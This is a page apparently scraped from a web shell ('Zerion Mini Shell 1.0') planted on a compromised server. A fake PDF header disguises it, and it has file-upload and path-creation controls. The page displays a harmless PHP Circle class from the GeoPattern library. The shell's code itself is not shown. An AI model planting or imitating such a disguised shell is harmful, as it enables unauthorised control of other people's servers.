%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home2/vacivi36/ava/lib/geopattern-php/GeoPattern/SVGElements/
Upload File :
Create Path :
Current File : //home2/vacivi36/ava/lib/geopattern-php/GeoPattern/SVGElements/Circle.php

<?php namespace RedeyeVentures\GeoPattern\SVGElements;

class Circle extends Base
{
    protected $tag = 'circle';

    function __construct($cx, $cy, $r, $args=array())
    {
        $this->elements = [
            'cx' => $cx,
            'cy' => $cy,
            'r' => $r,
        ];
        parent::__construct($args);
    }
}

Zerion Mini Shell 1.0